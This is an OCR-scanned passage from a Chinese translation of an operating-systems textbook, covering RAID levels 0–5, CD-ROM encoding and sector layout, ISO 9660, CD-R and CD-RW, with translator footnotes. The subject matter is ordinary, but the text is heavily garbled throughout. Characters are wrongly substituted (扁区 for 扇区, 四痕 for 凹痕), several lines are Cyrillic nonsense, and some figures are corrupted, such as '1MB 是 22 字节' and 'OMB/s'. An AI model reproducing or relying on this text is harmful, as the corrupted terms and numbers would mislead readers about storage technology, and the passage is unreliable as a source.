Ө MPG 是 Miles Per Gallon 的 缩写 ， 即 每 加 仑 燃油 可 以 跑 多 少 英里 。 各 国政 府 对 车 辆 燃油 经 济 性 的 要 求 越 来 越 
高 ， 目 前 30 MPG 标 准 成 为 衡量 各 家 公司 车 型 竞争 力度 的 标杆 。 一 一 译 者 注 
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理 第 二 个 请 求 。 控 制 器 的 责任 是 分 解 请 求 ， 并 且 以 正确 的 顺序 将 适当 的 命令 提供 给 适当 的 磁盘 ， 之 后 还 
鉴 在 内 存 中 将 结果 正确 地 装配 起 来 。0 级 RAID 的 性 能 是 杰出 的 而 实现 是 简单 明了 的 。 

对 于 习惯 于 每 次 请 求 一 个 扁 区 的 操作 系统 ，0 级 RAID 工 作 性 能 最 为 精 糕 。 虽 然 结果 会 是 正确 的 ,但 
是 却 不 存在 并 行 性 ， 因 此 也 就 没有 增进 性 能 。 这 一 结构 的 另 一 个 劣势 是 其 可 靠 性 潜在 地 比 SLED 还 要 差 。 
如 果 一 个 RAID 由 四 块 磁盘 组 成 ， 每 块 磁盘 的 平均 故障 间隔 时 间 是 20 000 小 时 ， 那 么 每 隔 5000 小 时 就 会 
有 一 个 驱动 器 出 现 故 障 并 且 所 有 数据 将 完全 丢失 。 与 之 相 比 ， 平 均 故障 间隔 时 间 为 20 000 小 时 的 SLED 
的 可 靠 性 要 高 出 四 倍 。 由 于 在 这 一 设计 中 未 引入 元 余 ， 实 际 上 它 还 不 是 真正 的 RAID。 

下 一 个 选择 一 一 ! 级 RAID 如 图 5-20b 所 示 ， 这 是 一 个 真正 的 RAID。 它 复制 了 所 有 的 磁 稚 ， 所 以 存在 
四 个 主 磁盘 和 四 个 备份 磁盘 。 在 执行 一 次 写 操作 时 ， 每 个 条 带 都 被 写 了 两 次 。 在 执行 一 次 读 操作 时 ， 则 
可 以 使 用 其 中 的 任意 一 个 副本 ， 从 而 将 负荷 分 布 在 更 多 的 驱动 器 上 。 因 此 ， 写 性 能 并 不 比 单个 驱动 器 好 ， 
但 是 读 性 能 能 够 比 单 个 驱动 器 高 出 两 倍 。 容 错 性 是 突出 的 : 如 果 一 个 驱动 器 崩溃 了 ， 只 要 用 副本 来 替代 
就 可 以 了 。 恢 复 也 十 分 简单 ， 只 要 安装 一 个 新 驱动 器 并 且 将 整个 备份 驱动 器 复制 到 其 上 就 可 以 了 。 

0 级 RAID 和 1 级 RAID 操 作 的 是 扇 区 条 带 ， 与 此 不 同 ，2 级 RAID 工 作 在 字 的 基础 上 ， 甚 至 可 能 是 字 节 
的 基础 上 。 想 象 一 下 将 单个 虚拟 磁盘 的 每 个 字 节 分 割 成 4 位 的 半 字 节 对 ， 然 后 对 每 个 半 字 节 加 入 一 个 汉 
明码 从 而 形成 7 位 的 字 ， 其 中 1、2、4 位 为 奇偶 校 验 位 。 进 一 步 想象 如 图 5-20c 所 示 的 7 个 驱动 器 在 磁盘 辟 
位 置 与 旋转 位 置 方面 是 同步 的 。 那 么 ， 将 ?位 汉 明 编码 的 字 写 到 7 个 驱动 器 上 ， 每 个 驱动 器 写 一 位 ， 这 样 
做 是 可 行 的 。 

Thinking Machine 公 司 的 CM-2 计 算 机 采用 了 这 一 方案 ， 它 采用 32 位 数据 字 并 加 入 6 个 奇偶 校 验 位 形 
成 一 个 38 位 的 汉 明 字 ， 再 加 上 一 个 额外 的 位 用 于 汉 明 字 的 奇偶 校 验 ， 并 且 将 每 个 字 分 布 在 39 个 磁盘 驱动 
器 上 。 因 为 在 一 个 扇 区 时 间 里 可 以 写 32 个 扇 区 的 数据 ， 所 以 总 的 吞吐 量 是 巨大 的 。 此 外 ， 一 个 驱动 器 的 
损坏 不 会 引起 问题 ， 因 为 损坏 一 个 驱动 器 等 同 于 在 每 个 39 位 字 的 读 操作 中 损失 一 位 ， 而 这 是 汉 明码 可 以 
轻松 处 理 的 事情 。 

不 利 的 一 面 是 ， 这 一 方案 要 求 所 有 驱动 器 的 旋转 必须 同步 ， 并 且 只 有 在 驱动 器 数量 很 充裕 的 情况 下 
才 有 意义 〈 即 使 对 于 32 个 数据 驱动 器 和 6 个 奇偶 驱动 器 而 言 ， 也 存在 19% 的 开销 )。 这 一 方案 还 对 控制 器 
提出 许多 要 求 ， 因 为 它 必 须 在 每 个 位 时 间 里 求 汉 明 校 验 和 。 

3 级 RAID 是 2 级 RAID 的 简化 版 本 ， 如 图 5-20d 所 示 。 其 中 要 为 每 个 数据 字 计 算 一 个 奇偶 校 验 位 并 且 
将 其 写 和 一 个 奇偶 驱动 器 中 。 与 2 级 RAID 一 样 ， 各 个 驱动 器 必须 精确 地 同步 ， 因 为 每 个 数据 字 分 布 在 多 
个 驱动 器 上 。 

乍 一 想 ， 似 乎 单个 奇偶 校 验 位 只 能 检测 错误 ， 而 不 能 纠正 错误 。 对 于 随机 的 未 知 错误 的 情形 ， 这 样 
的 看 法 是 正确 的 。 然 而 ， 对 于 驱动 器 崩溃 这 样 的 情形 ， 由 于 坏 位 的 位 置 是 已 知 的， 所 以 这 样 做 完全 能 够 
纠正 1 位 错误 。 如 果 一 个 驱动 器 崩溃 了 ,控制 器 只 需 假 装 该 驱动 器 的 所 有 位 为 0， 如 果 一 个 字 有 奇偶 错误 ， 
那么 来 自 废弃 了 的 驱动 器 上 的 位 原来 一 定 是 1， 这 样 就 纠正 了 错误 。 尽 管 2 级 RAID 和 3 级 RAID 两 者 都 提 
供 了 非常 高 的 数据 率 ， 但 是 每 秒 钟 它们 能 够 处 理 的 单独 的 IO 请 求 的 数目 并 不 比 单个 驱动 器 好 。 

4 级 RAID 和 5 级 RAID 再 次 使 用 条 带 ， 而 不 是 具有 奇偶 校 验 的 单个 字 。 如 图 5-20e 所 示 ，4 级 RAID 与 0 
级 RAID 相 类 似 ， 但 是 它 将 条 带 对 条 带 的 奇偶 条 带 写 到 一 个 额外 的 磁盘 上 。 例 如 ， 如 果 每 个 条 带 k 字 节 长 ， 
那么 所 有 的 条 带 进行 异 或 操作 ， 就 得 到 一 个 k 字 节 长 的 奇偶 条 带 。 如 果 一 个 驱动 器 崩溃 了 ， 则 损失 的 字 
节 可 以 通过 读 出 整个 驱动 器 组 从 奇偶 驱动 器 重新 计算 出 来 。 

这 一 设计 对 一 个 驱动 器 的 损失 提供 了 保护 ， 但 是 对 于 微小 的 更 新 其 性 能 很 差 。 如 果 一 个 扁 区 被 修改 
了 ， 那 么 就 必须 读 取 所 有 的 驱动 器 以 便 重新 计算 奇偶 校 验 ， 然 后 还 必须 重 写 奇偶 校 验 。 作 为 另 一 选择 ， 
它 也 可 以 读 取 旧 的 用 户 数据 和 旧 的 奇偶 校 验 数据 ， 并 且 用 它们 重新 计算 新 的 奇偶 校 验 。 即 使 是 对 于 这 样 
的 优化 ， 微 小 的 更 新 也 还 是 需要 两 次 读 和 两 次 写 。 

结果 ， 奇 偶 驱动 器 的 负担 十 分 沉重 ， 它 可 能 会 成 为 一 个 瓶颈 。 通 过 以 循环 方式 在 所 有 驱动 器 上 均匀 
地 分 布 奇 个 校 验 位 ，5 级 RAID 消 除了 这 一 瓶颈 ， 如 图 5-20f 所 示 。 然 而 ， 如 果 一 个 驱动 器 发 生 崩溃 ， 重 新 
构造 故障 驱动 器 的 内 容 是 一 个 非常 复杂 的 过 程 。 
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图 5-20 0 级 RAID 到 5 级 RAID (备份 驱动 器 及 奇偶 驱动 器 以 阴影 显示 ) 


3.CD-ROM 

最 近 几 年 ， 光 盘 《与 磁盘 相对 应 ) 开始 流行 。 光 盘 比 传统 的 磁盘 具有 更 高 的 记录 密度 。 光 盘 最 初 是 
为 记录 电视 节目 而 开发 的 ， 但 是 作为 计算 机 存储 设备 它们 可 以 被 赋予 更 为 重要 的 用 途 。 由 于 它们 洪 在 的 
巨大 容量 ， 光 盘 一 直 是 大 量 研究 工作 的 主题 ， 并 且 经 历 了 令 人 难以 置信 的 快速 发 展 。 

第 一 代 光 盘 是 荷兰 的 电子 集团 公司 飞利浦 为 保存 电影 而 发 明 的 。 它 们 的 直径 为 30 cm 并 且 以 
LaserVision 的 名 字 上 市 ， 但 是 它们 没有 流行 起 来 (日 本 除外 )。 

1980 年 ， 飞 利 浦 连同 索尼 开发 了 CD (Compact Disc， 压 缩 光 盘 )， 它 很 快 就 取代 了 每 分 钟 33 1/3 转 
的 乙烯 树脂 晶片 来 记录 音乐 〈 艺 术 鉴赏 家 除外 ， 他 们 仍旧 喜爱 乙烯 树脂 唱片 )。CD 的 准确 技术 细节 以 正 
式 国际 标准 (IS 10149) 的 形式 出 版 ， 由 于 其 封面 的 颜色 而 通俗 地 被 称 为 红皮书 (Red Book)。( 国 际 标 
准 由 国际 标准 化 组 织 发 布 ， 国 际 标准 化 组 织 是 诸如 ANSI、DIN 等 国家 标准 团体 的 国际 对 等 机 构 。 每 一 个 
国际 标准 都 有 一 个 IS 号 码 。) 将 光盘 以 及 驱动 器 的 规范 作为 国际 标准 出 版 ， 其 目的 在 于 让 来 自 不 同音 乐 
出 版 商 的 CD 和 来 自 不 同 电子 设备 制造 商 的 播放 器 能 够 一 同 工 作 。 所 有 的 CD 都 是 直径 120 mm， 厚 度 1.2 
mm， 中 间 有 一 个 15 mm 的 圆 孔 。 音 频 CD 是 第 一 个 成 功 的 大 众 市 场 数字 存储 介质 。 它 们 被 设想 应 该 能 够 
耐用 100 年 。 请 在 2080 年 进行 核对 ， 看 一 看 第 一 批 CD 还 能 不 能 很 好 地 工作 。 
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一 张 CD 的 准备 分 成 几 个 步骤 ， 包 括 使 用 高 功率 的 红外 流光 在 具有 涂 层 的 玻璃 母 盘 上 烧 出 许多 直径 
为 0.8hm 的 小 孔 。 从 这 张 母 盘 可 以 制作 出 铸模 ， 铸 模 在 激光 孔 所 在 的 位 置 具有 突起 。 将 熔化 的 聚 碳酸 栈 
树脂 注入 这 一 铸模 ， 就 可 以 形成 具有 与 防 瑞 母 盘 相同 小 孔 模式 的 一 张 CD。 然 后 将 一 个 非常 薄 的 反射 铝 
层 沉积 在 聚 碳 柄 酯 上， 再 加 上 一 层 保 护 性 的 深 腊 ， 最 后 加 上 一 个 标签 。 聚 碳酸 酷 基 片 中 的 叫 陷 处 称 为 外 
Ж. (рі), ШКС АВЕО ССЗ Н (land), 

ЧЕРИ, КОО ОЕ ВЕЗЕ HEKA. Bum, РА ЗЕЯ ЯТА НОЗИ REE 
上 。 激 光 在 聚 磋 酸 酯 一 面 ， 所 以 四 痕 朝 着 激光 的 方向 突出 ， 就 像 是 另 一 侧 平坦 表面 上 的 突起 一 样 。 因 为 四 
痕 的 高 度 是 激光 波长 的 四 分 之 一 ， 所 以 从 四 痕 反射 回 
来 的 光线 与 从 周围 表面 反射 回来 的 光线 在 相位 上 相差 
ENEK, НОВ, ПОНОВ, SAR БЕНЕТ 
的 光线 相 比 只 返回 很 少 的 光线 到 播放 器 的 光电 探测 器 。 
НЕКЕ ТОС MARMAR, ЕНЕ НИШ 
ЖОЗЕН ЕЛИН АЛЯ ЖЕК А, EEMU 
ЖОЕ ЕДЕН ШИ К Жа RL T А ЖЕЗ 
失 来 记录 0 却 更 加 可 靠 ， 所 以 采用 这 一 方案 。 

包 痕 和 村 崩 写 在 一 个 连续 螺旋 中 ， 该 螺旋 起 源 于 
接近 中 间 贺 孔 的 地 方 并 且 向 边缘 延伸 出 32 mm 的 距离 。 
螺旋 环绕 着 光盘 旋转 了 22 188 圈 (大约 每 毫米 600 围 )， 
如 果 展 开 的 话 ， 它 将 有 5.6 km 长 。 螺 旋 如 图 5-21 所 示 。 图 5-21 压缩 光盘 或 CD-ROM 的 记录 结构 

为 了 以 均匀 的 速度 播放 音乐 ， 必 须 让 凹 痕 和 模 准 
以 恒定 的 线 速度 通过 。 因 此 ， 当 CD 的 读 出 头 从 CD 的 内 部 向 外 部 移动 时 ，CD 的 旋转 速度 必须 连续 地 降低 。 
在 内 部 ， 旋 转速 度 是 530rpm 以 便 达到 期 望 的 每 秒 120 cm 的 流动 速度 ， 而 在 外 部 ， 旋 转速 度 必须 降 到 
200rpm 以 便 在 激光 头 处 得 到 相同 的 线 速度 。 恒 定 线 速度 驱动 器 与 磁盘 驱动 器 存在 相当 大 的 区 别 ， 后 者 以 
恒定 角速度 操作 ， 与 磁头 当前 处 于 什么 位 置 无 关 。 此 外 ，530rpm 与 大 多 数 磁盘 3600 ~ 7200rpm 的 旋转 速 
度 相 比 存在 相当 大 的 距离。 

1984 年 ， 飞 利 浦和 索尼 认识 到 使 用 CD 存放 计算 机 数据 的 潜力 ， 所 以 他 们 出 版 了 黄皮书 (Yellow 
Book), ， 定 义 了 现在 称 为 CD-ROM (Compact Disc-Read Only Memory， 压 缩 光盘 一 只 读 存储 器 ) ЖЯ 
的 确切 标准 。 为 了 借助 在 当时 已 经 十 分 牢固 的 音频 CD 市 场 ，CD-ROM 在 物理 尺寸 上 与 音频 CD 相同 ， 在 
机 械 上 和 光学 上 也 与 之 兼容 ， 并 且 使 用 相同 的 聚 碳 酸 酯 注 模 机 器 生产 。 这 一 决策 的 结果 是 ， 不 但 需要 组 
慢 的 可 变速 度 的 电机 ， 而 且 在 适度 的 销量 下 CD-ROM 的 制造 成 本 将 很 好 地 控制 在 ] 美 元 以 下 。 

黄皮书 所 定义 的 是 计算 机 数据 的 格式 化 。 它 还 改进 了 系统 的 纠 错 能 力 ， 这 是 一 个 必要 的 措施 ， 因 为 
尽管 音乐 爱好 者 并 不 介意 在 这 里 或 那里 丢失 一 位 ， 但 是 计算 机 爱好 者 往往 对 此 非常 挑 别 。CD-ROM 的 基 
本 格式 是 每 个 字 节 以 14 位 的 符号 进行 编码 。 正 如 我 们 在 前 面 看 到 的 ，14 位 足以 对 一 个 8 位 的 字 节 进行 汉 
明 编码 ， 并 且 剩 下 2 位 。 实 际 上 ，CD-ROM 使 用 的 是 功能 更 为 强大 的 编码 系统 9 。 对 于 读 操作 而 言 ，14 
到 8 映射 是 通过 查找 表 由 硬件 实现 的 。 

在 下 一 个 层次 上 ， 一 组 42 个 连续 符号 形成 一 个 588 位 的 帧 (frame)。 每 一 桢 拥有 192 个 数据 位 (24 个 
字 节 )， 剩 余 的 396 位 用 于 纠 错 和 控制 。 在 这 396 位 中 ，252 位 是 14 位 符号 中 的 纠 错位 ， 而 144 位 包含 在 8 位 
符号 的 有 效 载荷 中 。 到 目前 为 止 ， 这 一 方案 对 于 音频 CD 和 CD-ROM 是 完全 一 致 的 。 

黄皮书 所 增加 的 是 将 98 帧 编组 为 一 个 CD-ROM 扁 区 (CD-ROM sector) ， 如 图 5-22 所 示 。 每 个 CD- 
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Ө 该 编码 系统 称 为 EFM (Eight to Fourteen Modulation，8 到 14 调 制 ) 编码 ， 就 是 把 一 个 8 位 的 数据 〈 即 1 个 字 
节 ) 用 14 位 编码 来 表示 。 一 一 译 者 注 

Ө 此 处 的 描述 不 甚 准确 。 在 588 位 的 一 帧 数据 中 ， 有 24 位 同步 信息 (这 24 位 同步 位 不 经 EFM 编 码 ) 和 33 个 数 
RPH (每 个 字 节 经 过 14 位 EFM 编 码 )。 在 33 个 数据 字 节 中 ， 包 含有 效 数据 (或 称 有 效 载荷 ) AFH, 其 
余 9 字 区 用 于 控制 和 校 验 。 为 了 确保 读 出 信号 的 可 靠 性 ， 每 个 编码 字 之 间 插入 3 位 结合 位 ， 在 帧 尾 还 有 3 位 结 
合 位 ， 因 此 一 帧 的 长 度 为 24+33 х 14+34 х 3=588 位 。 一 一 译 者 注 
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ROM 扇 区 以 一 个 16 字 节 的 前 导 码 开始 ， 其 中 前 12 个 字 节 为 00FFFFFFFFFFFFFFFFFFFF00 (十 六 进 制 )， 
以 便 让 播放 器 识别 一 个 CD-ROM 扇 区 的 开始 。 接 下 来 的 3 个 字 节 包含 扇 区 号 ， 这 是 必需 的 ， 因 为 在 具有 
单个 数据 螺旋 的 CD-ROM 上 寻 道 比 在 具有 均匀 同心 磁道 的 磁盘 上 寻 道 要 困难 得 多 。 为 了 进行 寻 道 ， 驱 动 
器 中 的 软件 要 计算 出 一 个 近似 的 位 置 ， 将 激光 头 移动 到 那里 ， 然 后 开始 在 四 周 搜索 一 个 前 导 码 来 看 一 看 
猜测 的 如 何 。 前 导 码 的 最 后 一 个 字 节 是 模式 。 

эзоп. ооп 每 个 符号 包含 8 个 数据 位 和 6 个 纠 错位 


42 个 符号 构成 14 x 42=588 位 的 一 帧 


ooooo9oo Ooooooo AUSIN EMI 
字 : Жы: 
Жү тте ANE (24 字 节 ) 和 396 个 纠 链 位 
数据 [кс] ышк 
(2335241) 
字 节 16 2048 288 


045-22 CD-ROM 上 的 逻辑 数据 布局 


黄皮书 定义 了 两 种 模式 。 模 式 1 使 用 图 5-22 的 布局 ， 具 有 16 字 节 的 前 导 码 、2048 个 数据 字 节 和 一 个 
288 字 节 的 纠 错 码 ( 横 交叉 Reed-Solomon 码 )。 模 式 2 将 数据 和 ECC 域 合并 成 一 个 2336 字 节 的 数据 域 ， 用 
于 不 需要 纠 错 (或 者 抽 不 出 时 间 执 行 纠 错 ) 的 应 用 ， 例 如 音频 和 视频 。 注 意 ， 为 了 提供 优异 的 可 靠 性 ， 
在 符号 内 部 、 帧 内 部 和 CD-ROM 扇 区 内 部 使 用 了 三 种 独立 的 纠 错 方案 。 单个 位 的 错误 在 最 低 的 层次 上 纠 
正 ， 短 暂 的 突 发 错误 在 帧 的 层次 上 纠正 ， 任 何 残留 的 错误 在 扇 区 的 层次 上 捕获 。 为 这 一 可 靠 性 付出 的 代 
价 是 花费 98 个 588 位 的 帧 (7203 字 节 ) 来 容纳 2048 字 节 的 有 效 载 荷 ， 效 率 只 有 28% 。 

单 速 CD-ROM 驱 动 器 以 75 扇 区 / 秒 的 速度 工作 ， 提 供 的 数据 率 在 模式 1 下 是 153 600 字 节 / 秒 ， 在 模式 2 下 
是 175 200 字 节 / 秒 。 双 速 驱动 器 快 两 倍 ， 以 此 类 推 ， 直 到 最 高 的 速度 。 因 此 ， 一 个 40 倍 速 的 驱动 器 能 够 以 40 
X 153 600 字 节 / 秒 的 速度 传递 数据 ， 假 设 驱 动 器 接口 、 总 线 以 及 操作 系统 都 能 够 处 理 这 样 的 数据 率 。 一 个 标 
准 的 音频 CD 具有 存放 74 分 钟 音乐 的 空间 ， 如 果 将 其 用 于 在 模式 1 下 存放 数据 ， 提 供 的 容量 是 681 984 000 字 
节 。 这 一 数字 通常 被 报告 为 650MB ， 这 是 因为 IMB 是 22 字 节 (1 048 576 字 节 )， 而 不 是 1 000 000 字 节 。 

注意 ， 即 使 一 个 32 倍 速 的 CD-ROM 驱 动 器 (数据 率 为 4 915 200 字 节 / 秒 ) 也 无 法 与 速度 为 OMB/s 的 
快速 SCSI-2 磁 盘 驱动 器 相配 ， 尽 管 许多 CD-ROM 驱 动 器 使 用 了 SCSI 接 口 (也 存在 IDE CD-ROM 驱 动 器 ) 。 
当 你 意识 到 寻 道 时 间 通常 是 几 百 毫秒 时 ， 就 会 清楚 CD-ROM 驱 动 器 与 磁盘 驱动 器 在 性 能 上 不 属于 同样 的 
范畴 ， 尽 管 它们 有 非常 大 的 容量 。 

1986 年 ， 飞 利 浦 以 绿 皮 书 (Green Book) 再 度 出 击 ， 补充 了 图 形 以 及 在 相同 的 扇 区 中 保存 交错 的 音 
频 、 视 频 和 数据 的 能 力 ， 这 对 于 多 媒体 CD-ROM 而 言 是 十 分 必要 的 。 

CD-ROM 的 最 后 一 个 难题 是 文件 系统 。 为 了 使 相同 的 CD-ROM 能 够 在 不 同 的 计算 机 上 使 用 ， 有 关 
CD-ROM 文 件 系统 的 协议 是 必要 的 。 为 了 达成 这 一 协议 ， 许多 计算 机 公司 的 代表 相聚 在 加 利 福 尼 亚 和 内 
华 达 两 州 边界 处 Tahoe 湖 畔 的 High Sierra 宾 馆 ， 设 计 了 被 他 们 称 为 High Sierra 的 文件 系统 ， 这 一 文件 系统 
后 来 发 展 成 为 一 个 国际 标准 (15 9660)。 该 文件 系统 有 三 个 层次 。 第 一 层 使 用 最 多 8 个 字符 的 文件 名 ， 可 
选 地 跟随 最 多 3 个 字符 的 扩展 名 (MS-DOS 的 文件 命名 约定 )。 文件 名 只 能 够 包含 大 写字 母 、 数 字 和 下 划 
线 。 目 录 能 够 能 套 最 多 8 层 深度 ， 但 是 目录 名 不 能 包含 扩展 名 。 第 一 层 要 求 所 有 文件 都 是 连续 的 ， 这 对 
于 只 能 写 一 次 的 介质 来 说 并 不 是 一 个 问题 。 符合 IS 9660 标 准 第 一 层 的 任何 CD-ROM 都 可 以 使 用 MS-DOS、 
苹果 计算 机 、UNIX 计 算 机 或 者 几乎 任何 其 他 计算 机 读 出 。CD-ROM 出 版 商 十 分 看 重 这 一 特性 ， 视 其 为 
重大 的 有 利 因素 。 

IS 9660 第 二 层 允 许 文 件 名 最 多 有 32 个 字符 ， 第 三 层 允 许 文 件 是 不 连续 的 。Rock Ridge 扩 展 允 许 非常 
长 的 文件 名 (针对 UNIX)、UID、GID 和 符号 连接 ， 但 是 不 符合 第 一 层 标准 的 CD-ROM 将 不 能 在 所 有 计 
算 机 上 可 读 。 

对 于 出 版 各 种 游戏 、 电 影 、 百 科 全 书 、 地 图 集 以 及 参考 手册 ， CD-ROM 已 经 变 得 非常 流行 。 大 多 数 商业 
软件 现在 也 是 通过 CD-ROM 发 行 的 。 巨 大 的 容量 和 低廉 的 生产 成 本 相 结合 ， 使 得 CD-ROM 适 合 无 数 的 应 用 。 
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4. 可 刻录 CD 

起 初 ， 制 造 一 片 CD-ROM 母 盘 (或 音频 CD 母 盘 ， 就 此 事 而 言 ) 所 需要 的 设备 极其 昂贵 。 但 是 按照 
计算 机 产业 的 惯例 ， 没 有 什么 东西 能 够 长 久 地 保持 高 价位 。 到 20 世 纪 90 年 代 中 期 ， 尺 寸 不 比 CD 播放 器 
大 的 CD 刻录 机 在 大 多 数 计算 机 商店 中 已 经 是 可 以 买 到 的 常见 外 部 设备 。 这 些 设备 仍然 不 同 于 磁盘 ， 因 
为 一 旦 写 人 ，CD-ROM 就 不 能 被 擦 除了 。 然 而 ， 它 们 很 快 就 找到 了 适当 的 位 置 ， 即 作为 大 容量 硬盘 的 备 
份 介质 ， 并 且 还 可 以 让 个 人 或 刚 起 步 的 公司 制造 他 们 自己 的 小 批量 的 CD-ROM， 或 者 制作 母 盘 以 便 递交 
给 高 产量 的 商业 CD 复制 工厂 。 这 些 驱 动 器 被 称 为 是 CD-R (CD-Recordable， 可 刻录 CD)。 

物理 上 ，CD-R 在 开始 的 时 修 是 像 CD-ROM 一 样 的 120mm 的 亭 碳酸 酯 空 组 ， 不 同 的 是 CD-R 包 含 一 个 
0.6mm 宽 的 凹 档 来 引导 激光 进行 写 操作 。 凹 模具 有 3mm 的 正弦 振幅 ， 频 率 精 确 地 为 22.05 kHz， 以 便 提供 
连续 的 反馈 ， 这 样 就 可 以 正确 地 监视 旋转 速度 并 且 在 需要 的 时 候 对 其 进行 调整 。CD-R 看 上 去 就 像 是 党 
规 的 CD-ROM， 只 是 CD-R 顶 面 是 金色 的 而 不 是 银色 的 。 金 色 源 于 使 用 真 金 代替 铝 作为 反射 层 。 银 色 的 
CD 在 其 上 具有 物理 的 外 陷 ， 与 此 不 同 的 是 ， 在 CD-R 上 ， 必 须 模拟 乌 痕 和 村 痊 的 不 同 反 射 率 。 这 是 通过 
在 聚 碳酸 酯 与 反射 金 层 之 间 添加 一 层 染 料 而 实现 的 ， 如 图 5-23 所 示 。 使 用 的 染料 有 两 种 :绿色 的 花 著 和 
谈 桥 黄色 的 枉 闭 。 至 于 哪 一 种 染料 更 好 化 学 家 们 可 能 会 无 休止 地 争论 下 去 。 这 些 染 料 与 摄影 技术 中 使 用 
的 染料 相 类 似 ， 这 就 解释 了 为 什么 柯达 和 富士 是 主要 的 空白 CD-R 制 造 商 。 
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图 5-23 CD-R 盘 和 激光 的 横 截面 (未 按 比例 画 )。 银 色 的 CD-ROM 具 有 
类 似 的 结构 ， 只 是 不 具有 染料 层 并 且 以 有 凹 痕 的 铝 层 代替 金 层 


在 初始 状态 下 ， 染 料 层 是 透明 的 ， 能 够 让 激光 透 过 并 且 从 金 层 反射 回来 。 写 入 时 ，CD-R 激 光 提 升 
到 高 功率 (8~ 16mW)。 当 光束 遇 到 染料 时 ， 将 其 加 热 ， 从 而 破坏 其 化 学 结合 力 ， 这 一 分 子 结构 的 变化 
造成 一 个 瞳 竹 。 当 读 回 时 (以 0.5mW)， 光 电 探 测 器 会 识别 出 已 经 被 烧 过 的 染料 处 的 暗 班 与 完好 的 透明 
区 域 之 间 的 区 别 。 这 一 区 别 被 解释 为 目 痕 与 桓 疹 之 间 的 差别 ， 即 使 在 常规 的 CD-ROM 阅 读 器 甚至 在 音频 
CD 播放 器 上 读 回 时 ， 也 是 如 此 。 

如 果 没 有 一 本 “有 色 的 ” 书 ， 就 没有 CD 的 新 类 型 能 够 骄傲 地 昂 起 头 ， 所 以 CD-R 具 有 橘 攻 书 
(Orange Book)， 出 版 于 1989 年 。 这 份 文档 定义 了 CD-R 和 一 个 新 格式 CD-ROM XA， 它 允许 CD-R 被 逐渐 
增长 地 写 入 ， 今 天 几 个 扁 区 ， 明 天 几 个 扁 区 ， 下 个 月 几 个 扁 区 。 一 次 写 人 的 一 组 连续 的 扁 区 称 为 一 个 
CD-ROM 光 轨 (CD-ROM track), 

CD-R 的 最 初 应 用 之 一 是 柯达 PhotoCD。 在 这 一 系统 中 ， 消 费 者 将 一 卷 已 曝光 的 胶片 和 老 的 PhotoCD 
带 给 照片 加 工 者 ， 并 且 取 回 同一 个 PhotoCD， 其 中 新 的 照片 已 经 添加 到 老 的 照片 之 后 。 新 的 一 批 照片 是 
通过 扫描 底片 创建 的 ， 它 们 作为 单独 的 CD-ROM 光 轨 写 在 PhotoCD 上 。 逐 渐 增长 式 写 人 是 需要 的 ， 因 为 
在 这 一 产品 引入 的 时 候 ，CD-R 空 盘 还 过 于 昂贵 ， 以 至 于 负担 不 起 为 每 个 胶卷 提供 一 张 盘 。 
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然而 ， 逐 渐 增长 式 写 和 造成 一 个 新 的 问题 。 在 橘 皮 书 之 前 ， 所 有 的 CD-ROM 在 开始 处 有 一 个 VTOC 
(Volume Table of Contents， 老 目录 )。 这 一 方法 对 于 逐渐 增长 式 (也 就 是 多 光 轨 ) SAETTA. Hi 
皮 书 的 解决 方案 是 给 每 个 CD-ROM 光 轨 提 供 自己 的 VTOC， 在 VTOC 中 列 出 的 文件 可 以 包含 某 些 或 者 所 
有 来 自 先 前 光 轨 中 的 文件 。 当 CD-R 被 插入 到 驱动 器 之 后 ， 操 作 系 统 从 头 到 尾 搜索 所 有 的 CD-ROM 光 轨 
以 定位 最 近 的 VTOC， 它 提供 了 光盘 的 当前 状态 。 通 过 在 当前 VTOC 包 含 来 自 先前 光 轨 中 的 某 些 而 不 是 
全 部 文件 ， 可 能 会 引起 错觉 ， 即 文件 已 经 被 噜 除了 。 光 轨 可 以 被 分 组 成 段 (session)， 这 样 就 引出 了 多 
Ж. (multisession) CD-ROM。 标 准 的 音频 CD 播放 器 不 能 处 理 多 段 CD， 因 为 它们 要 求 在 开始 处 有 一 个 
VTOC。 可 是 ， 某 些 计算 机 应 用 程序 可 以 处 理 它们 。 

CD-R 使 得 个 人 和 公司 轻松 地 复制 CD-ROM (和 音频 CD) 成 为 可 能 ， 只 是 通常 会 侵犯 出 版 商 的 版 权 。 
人 们 设计 了 几 种 方案 使 这 种 盗版 行为 更 加 困难 ， 并 且 使 除了 出 版 商 的 软件 以 外 的 任何 软件 都 难于 用 来 读 
取 CD-ROM。 方 案 之 一 是 在 CD-ROM 上 将 所 有 文件 的 长 度 记录 为 几 吉 字 节 ， 从 而 挫败 任何 使 用 标准 复制 
软件 将 文件 复制 到 硬盘 上 的 企图 。 实 际 的 文件 长 度 圣 入 在 出 版 商 的 软件 中 ， 或 者 隐藏 (可 能 是 加 密 的 ) 
在 CD-ROM 上 意 想 不 到 的 地 方 。 另 一 种 方案 是 在 挑选 出 来 的 扇 区 中 故意 使 用 错误 的 ECC， 期 望 CD 复制 
软件 将 会 “修正 ”这 些 错误 ， 而 应 用 程序 软件 则 核对 ECC 本 身 ， 如 果 是 正确 的 就 拒绝 工作 。 使 用 光 轨 间 
非 标准 的 间隙 和 其 他 物理 “ 环 竟 ”也 是 可 能 的 。 

5. 可 重 写 CD 

尽管 人 们 习惯 于 使 用 其 他 一 次 性 写 的 介质 ， 例 如 纸张 和 摄影 胶片 ， 但 是 却 存在 着 对 可 重 写 CD-ROM 
的 需求 。 目 前 可 用 的 一 个 技术 是 CD-RW (CD-ReWritable， 可 重 写 CD) ， 它 使 用 与 CD-ROM 相 同 尺 寸 的 
介质 。 然 而 ，CD-RW 使 用 银 、 锣 、 镜 和 磁 合 金 作为 记录 层 ， 以 取代 花 半 和 本 送 染 料 。 这 一 合金 具有 两 
个 稳定 的 状态 :结晶 态 和 非 结 晶 态 ， 两 种 状态 具有 不 同 的 反射 率 。 

CD-RW 驱 动 器 使 用 具有 三 种 不 同 功率 的 激光 。 在 高 功率 下 ， 激 光 将 合金 融化 ， 将 其 从 高 反射 率 的 
结晶 态 转 化 为 低 反 射 率 的 非 结 晶 态 ， 代 表 一 个 止 痕 。 在 中 功率 下 ， 激 光 将 合金 融化 并 重 构 其 自然 结晶 状 
态 以 便 再 次 成 为 一 个 权 奉 。 在 低 功率 下 ， 材 料 的 状态 被 感知 (用 于 读 取 )， 但 是 不 发 生 状 态 的 转化 。 

CD-RW 没 有 取代 CD-R 的 原因 是 CD-RW 空 白 盘 比 CD-R 空 白 盘 要 昂贵 得 多 。 此 外 ， 对 于 涉及 对 硬 稚 
